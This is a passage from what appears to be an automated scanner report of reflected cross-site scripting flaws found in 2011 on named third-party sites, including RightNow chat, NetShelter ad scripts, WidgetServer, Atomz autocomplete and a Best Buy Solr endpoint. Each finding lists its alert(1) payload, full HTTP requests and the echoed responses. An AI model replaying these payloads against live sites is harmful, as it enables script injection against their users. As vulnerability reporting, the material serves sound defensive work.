The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a069'%3balert(1)//a554b3287db was submitted in the REST URL parameter 3. This input was echoed as 8a069';alert(1)//a554b3287db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7529b'%3balert(1)//3afc937eb48 was submitted in the REST URL parameter 4. This input was echoed as 7529b';alert(1)//3afc937eb48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e346'%3balert(1)//86988af10f8 was submitted in the REST URL parameter 5. This input was echoed as 4e346';alert(1)//86988af10f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58f10'%3balert(1)//25181935610 was submitted in the REST URL parameter 1. This input was echoed as 58f10';alert(1)//25181935610 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b47b8'%3balert(1)//83a63c7b35c was submitted in the REST URL parameter 2. This input was echoed as b47b8';alert(1)//83a63c7b35c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb460'%3balert(1)//e60c9431fa3 was submitted in the REST URL parameter 3. This input was echoed as bb460';alert(1)//e60c9431fa3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66fcf'%3balert(1)//5350e8a8c99 was submitted in the REST URL parameter 4. This input was echoed as 66fcf';alert(1)//5350e8a8c99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59514'%3balert(1)//684607607d8 was submitted in the REST URL parameter 5. This input was echoed as 59514';alert(1)//684607607d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b465'%3balert(1)//62add0462bb was submitted in the REST URL parameter 1. This input was echoed as 1b465';alert(1)//62add0462bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2011 22:35:27 GMT Server: Apache Content-Type: text/html Content-Language: en Vary: Accept-encoding Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 299e0'%3balert(1)//bca7c7ba913 was submitted in the REST URL parameter 2. This input was echoed as 299e0';alert(1)//bca7c7ba913 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 2cb1d<script>alert(1)</script>45f4ec0d44a was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 79308<script>alert(1)</script>6e5cfd0a1c8 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 261ad<script>alert(1)</script>9c83b70164f was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 128f0<script>alert(1)</script>073f8a07027 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload b0e7f<script>alert(1)</script>7e360bc2df2 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d6c0e<script>alert(1)</script>c374874210e was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 8eada<script>alert(1)</script>53915b59fa0 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 513c2<script>alert(1)</script>63f76fd61fa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3f1a<img%20src%3da%20onerror%3dalert(1)>a456b84bccc was submitted in the REST URL parameter 3. This input was echoed as b3f1a<img src=a onerror=alert(1)>a456b84bccc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Chat/chat/rightnowb3f1a<img%20src%3da%20onerror%3dalert(1)>a456b84bccc?pool=3571:5&action=PROACTIVE_QUERY&avail_type=agents&p_db_name=rightnow&p_intf_id=1&queue_id=61&responseType=JSON&callback=rntJSONpac_1 HTTP/1.1 Host: bcvipca02.rightnowtech.com Proxy-Connection: keep-alive Referer: http://www.rightnow.com/search/?q=xss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
rntJSONpac_1({"error":{"chatSystemError":{"text":"Unknown or misconfigured site specified in '/rightnowb3f1a<img src=a onerror=alert(1)>a456b84bccc' AT Wed Aug 31 11:18:05 PDT 2011","chatMessageType":"ChatSystemError","type":{"value":"CANCEL","chatMessageType":"ChatErrorType"},"errorCondition":{"value":"SERVICE_UNAVAILABLE","chatMessageType":"Cha ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload da0b6<script>alert(1)</script>d4681e8f055 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Chat/chat/rightnow?pool=3571:5&action=PROACTIVE_QUERY&avail_type=agents&p_db_name=rightnow&p_intf_id=1&queue_id=61&responseType=JSON&callback=rntJSONpac_1da0b6<script>alert(1)</script>d4681e8f055 HTTP/1.1 Host: bcvipca02.rightnowtech.com Proxy-Connection: keep-alive Referer: http://www.rightnow.com/search/?q=xss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the callbackArgument request parameter is copied into the HTML document as plain text between tags. The payload ae9d7<img%20src%3da%20onerror%3dalert(1)>ceff7420d19 was submitted in the callbackArgument parameter. This input was echoed as ae9d7<img src=a onerror=alert(1)>ceff7420d19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
RightNow.Chat.Controller.ChatCommunicationsController.onPostMessageSuccess({"data":["0ae9d7<img src=a onerror=alert(1)>ceff7420d19"],"chatMessageType":"ChatMessage","responses":[{"sessionId":"1a724kt3h9vx819uympgg8zeuo","chatSystemError":{"text":"JSESSIONID not specified or invalid","chatMessageType":"ChatSystemError","type":{"va ...[SNIP]...
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload ea276<script>alert(1)</script>2c8c12f6b22 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.201. http://brocade.netshelter.net/fixed_placement.js.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://brocade.netshelter.net
Path:
/fixed_placement.js.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16f4f"%3balert(1)//73dd2287075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16f4f";alert(1)//73dd2287075 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fixed_placement.js.php?publisher=info/16f4f"%3balert(1)//73dd2287075rmit HTTP/1.1 Host: brocade.netshelter.net Proxy-Connection: keep-alive Referer: http://www.informit.com/index.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var NS_37_1_useDoubleClickCodes = ('%c'.length != 2);
//Include NAP window.blockNSPageTrack = true; /* IE doesn't support indexOf, so we must teach it. Normally, we wouldn't muck with * Array.prot ...[SNIP]... orting as this var NS_37_1_adSize="1x1"; // site name - any string - %s is the DART site variable - will be displayed in reporting as this //var NS_37_1_adSite="%s"; var NS_37_1_adSite = "ns." + "info/16f4f";alert(1)//73dd2287075rmit"; // click tracker - %c is the DART click tracker variable and should go at the start if we want to track via DART var NS_37_1_adClickTrack = (NS_37_1_useDoubleClickCodes ? '%c' : '') + "http://a ...[SNIP]...
The value of the publisher request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a983"%3balert(1)//1a28d2ffdbe was submitted in the publisher parameter. This input was echoed as 5a983";alert(1)//1a28d2ffdbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fixed_placement.js.php?publisher=informit5a983"%3balert(1)//1a28d2ffdbe HTTP/1.1 Host: brocade.netshelter.net Proxy-Connection: keep-alive Referer: http://www.informit.com/index.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var NS_37_1_useDoubleClickCodes = ('%c'.length != 2);
//Include NAP window.blockNSPageTrack = true; /* IE doesn't support indexOf, so we must teach it. Normally, we wouldn't muck with * Array.prot ...[SNIP]... ing as this var NS_37_1_adSize="1x1"; // site name - any string - %s is the DART site variable - will be displayed in reporting as this //var NS_37_1_adSite="%s"; var NS_37_1_adSite = "ns." + "informit5a983";alert(1)//1a28d2ffdbe"; // click tracker - %c is the DART click tracker variable and should go at the start if we want to track via DART var NS_37_1_adClickTrack = (NS_37_1_useDoubleClickCodes ? '%c' : '') + "http://adv.n ...[SNIP]...
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 1af17<script>alert(1)</script>33d62cd3122 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload c89cc<img%20src%3da%20onerror%3dalert(1)>a91674af5dd was submitted in the REST URL parameter 14. This input was echoed as c89cc<img src=a onerror=alert(1)>a91674af5dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134c89cc<img%20src%3da%20onerror%3dalert(1)>a91674af5dd/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Wed, 31 Aug 2011 21:50:36 GMT Expires: Sat, 03 Sep 2011 21:49:36 GMT ObjectVersions: [Inst: req 2, db 2]; [Reg: req 21, db 21]; P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web03 Content-Length: 5404
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6044<a>0e177e272a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30d6044<a>0e177e272a8/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Wed, 31 Aug 2011 21:50:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web01 Content-Length: 1190
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 97343<script>alert(1)</script>30c35374104 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload d18a5<script>alert(1)</script>d6a4d83a2ea was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 95b5d<script>alert(1)</script>82aca6beb88 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d15fa<script>alert(1)</script>7b7135fe1a9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete/sp10/04/3b/7b/?max_results=200&jsonp=true&callback=preTermSuggCallbackFunctiond15fa<script>alert(1)</script>7b7135fe1a9&query=xs&d=jsonp1314795877616&_=1314795881111 HTTP/1.1 Host: content.atomz.com Proxy-Connection: keep-alive Referer: http://www.adobe.com/cfusion/search/index.cfm?loc=en_us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 31 Aug 2011 13:05:18 GMT Content-Type: application/json Via: 1.1 content.atomz.com:84 X-Cache: MISS from content.atomz.com Content-Length: 136
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1f1bd<script>alert(1)</script>a2d5e472f3f was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /solr/select/?callback=jsonp13131063158131f1bd<script>alert(1)</script>a2d5e472f3f&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1 Host: content.bestbuyon.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK Server: Apache/2.2.12 (Ubuntu) Last-Modified: Thu, 11 Aug 2011 21:11:00 GMT ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI=" Vary: Accept-Encoding Content-Type: text/plain;charset=UTF-8 Content-Length: 2590 Date: Thu, 11 Aug 2011 23:44:31 GMT Connection: close
The value of the fl request parameter is copied into the HTML document as plain text between tags. The payload 3303d<script>alert(1)</script>b6529cfca94 was submitted in the fl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created3303d<script>alert(1)</script>b6529cfca94&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1 Host: content.bestbuyon.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK Server: Apache/2.2.12 (Ubuntu) Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI=" Vary: Accept-Encoding Content-Type: text/plain;charset=UTF-8 Content-Length: 2482 Date: Thu, 11 Aug 2011 23:44:32 GMT Connection: close
bbyon.ajaxReturnTaxonometricSuccess({ "responseHeader":{ "status":0, "QTime":0, "params":{ "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess", "fl":"title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created3303d<script>alert(1)</script>b6529cfca94", "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc", "indent":"on", "start":"0", "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery", "callba ...[SNIP]...
The value of the indent request parameter is copied into the HTML document as plain text between tags. The payload a4c14<script>alert(1)</script>d4c6728b788 was submitted in the indent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=ona4c14<script>alert(1)</script>d4c6728b788&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1 Host: content.bestbuyon.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK Server: Apache/2.2.12 (Ubuntu) Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI=" Vary: Accept-Encoding Content-Type: text/plain;charset=UTF-8 Content-Length: 2590 Date: Thu, 11 Aug 2011 23:44:32 GMT Connection: close
bbyon.ajaxReturnTaxonometricSuccess({ "responseHeader":{ "status":0, "QTime":0, "params":{ "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess", "fl":"title,type,ss_type,ss_feature_desc,sis_field ...[SNIP]... mage,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created", "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc", "indent":"ona4c14<script>alert(1)</script>d4c6728b788", "start":"0", "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery", "callback":"jsonp1313106315813", "qt":"standard", "wt":"json", "rows":"3"}}, "response":{"numFound":7, ...[SNIP]...
The value of the json.wrf request parameter is copied into the HTML document as plain text between tags. The payload 7be8e<script>alert(1)</script>cadeab2043d was submitted in the json.wrf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess7be8e<script>alert(1)</script>cadeab2043d HTTP/1.1 Host: content.bestbuyon.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK Server: Apache/2.2.12 (Ubuntu) Last-Modified: Thu, 11 Aug 2011 21:25:00 GMT ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI=" Vary: Accept-Encoding Content-Type: text/plain;charset=UTF-8 Content-Length: 2631 Date: Thu, 11 Aug 2011 23:44:33 GMT Connection: close
1.214. http://content.bestbuyon.com/solr/select/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://content.bestbuyon.com
Path:
/solr/select/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7190a<script>alert(1)</script>c544176858a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess&7190a<script>alert(1)</script>c544176858a=1 HTTP/1.1 Host: content.bestbuyon.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK Server: Apache/2.2.12 (Ubuntu) Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI=" Vary: Accept-Encoding Content-Type: text/plain;charset=UTF-8 Content-Length: 2599 Date: Thu, 11 Aug 2011 23:44:33 GMT Connection: close
bbyon.ajaxReturnTaxonometricSuccess({ "responseHeader":{ "status":0, "QTime":0, "params":{ "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess", "fl":"title,type,ss_type,ss_feature_desc,sis_field ...[SNIP]... ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created", "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc", "indent":"on", "7190a<script>alert(1)</script>c544176858a":"1", "start":"0", "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery", "callback":"jsonp1313106315813", "qt":"standard", "wt":"json", "rows":"3"}}, "response":{"numFound ...[SNIP]...
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload a1818<script>alert(1)</script>aed90a4ab72 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
